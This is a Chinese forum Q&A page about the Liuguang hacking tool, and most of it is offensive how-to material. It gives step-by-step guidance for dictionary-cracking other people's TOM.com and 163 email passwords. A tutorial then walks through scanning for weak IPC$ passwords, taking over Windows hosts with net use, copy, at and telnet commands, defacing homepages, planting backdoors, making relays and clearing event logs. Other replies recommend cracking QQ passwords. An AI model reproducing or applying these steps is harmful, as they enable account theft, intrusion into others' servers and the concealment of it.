流光5的字典怎么做?
流光5的制作我就不知道了,就知道下面的;
流光是一款大名鼎鼎的高级扫描工具,为著名网络安全专家小榕所开发,流光可以探测POP3.上的各种漏洞.它能把一个刚刚会使用鼠标的人塑造为专业级的黑客.最流行的是windows2000/xp用户所能使用的最新版本流光5.0.和window98/me用户的终极最爱流光IV.下面看看如何利用流光软件破解邮件帐号.
启动流光,在左侧列表的POP3处添加破解的POP3地址,这里以破解TOM.COM邮箱为例.对POP3主机点右键"编辑"---"添加",然后填上那个TOM.COM的POP3地址POP.TOM.COM.添加完成后结果如图所示.
下面需要添加我们在进行暴力破解时要用的用户字典.右键点击POP.163.NET.选择"编辑"---"添加"命令添加某个特定的邮箱用户.
添加用户字典完成以后,点击"显示所有项目"便可显示欲破解的用户列表,
POP3地址和用户字典都有了,如果是大量的用户,则点击流光任务栏中的"探测"---"简单模式探测",搜索出弱口令用户,如果是少量的用户,或添加的是单个指定的用户,则可以使用密码字典文件进行破解.在左侧列表中鼠标右击"解码字典或方案",选择"编辑"---"添加"添加一个密码字典文件,然后点击流光任务栏中的"探测"---"标准模式探测"
现在要做的事就是等待结果了,这段时间可以去聊天或看电视,等时间差不多了,回来看看破解结果,
破解结束后,流光软件还会给出一个入侵检测报告,显示本次扫描的结果.扫描出密码的用户会在所有用户列表的前面单独显示出来.点击在列表中显示的已扫描出密码的用户,就会弹出一个"查看密码"的对话框.可以看到密码再次验证成功.
请教使用流光5.0高手
我来给你说几句吧!呵呵!我的KU6里面有流光5的教程,希望可以让你理解它!呵呵!还是不要轻易的利用哦!哈哈
流光是一款黑客工具,也是系统检测的工具.和X-SCAN SUPERSCAN的作用是一样的呵呵!
流光基础教程
一、目的和任务:
1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。
2、学习IPC探测的相关知识。
二、探测流程:
1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!
什么是IPC:
IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。
IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。
注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。
可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …
2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。
在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。
3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机
4、探测中……
(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)
有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。
黑了他 !
开个dos prompt 执行如下命令,本次用的例子如下图。
1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接
2、 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 :) 这里文件多。
3、 net time \\对方IP || 看看对方的本地时间
4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。
5、 telnet 对方ip 端口 ||
6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||
7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .
假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot
下面的图有演示
8、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:
执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)
9、还能做成其他的么 ?
当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)
10、日志清除,断开连接 :
执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use \\ip\ipc$ /delete
这步我认为是必需的,尤其是在一些有争议的站点上,或者是国内的站点,除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。
在网吧写完 :( 错误之处请赐教。
只要是学习、谁都会遇到困难,如果你有时间还得向小榕、EKIN讨教!
用X-scan扫描163邮箱的密码无法连续扫描整个字典
晕勒..X-SCAN 只是个扫描软件`~!可以扫描端口``要是破解``邮箱的话.没那么容易.163也不是吃素的..你用那个字典``破解的几率`几乎为 %10都没有.况且要是破解`密码复杂的``要花更久的时间和 `更大的硬盘.....
建议你用``流光5.0 破解`邮箱`或 QQ密码。
第二个问题..
X-SCAN 不是万能的``况且,你要`用那个扫描漏洞?
漏洞指的是什么漏洞呢?
3389 还是什么?
!~`
`入侵不是那么好入侵的.况且现在``网络知识,是人的会点....
`
我的邮船箱密码被别人改了,怎么办啊?
可以啊 !密码保护啊 自己去找囬来噢!
呵呵 如果你忘暸 就再申请个吧!
可以点忘记密码
一步步通过注册的资料找回密码
0条大神的评论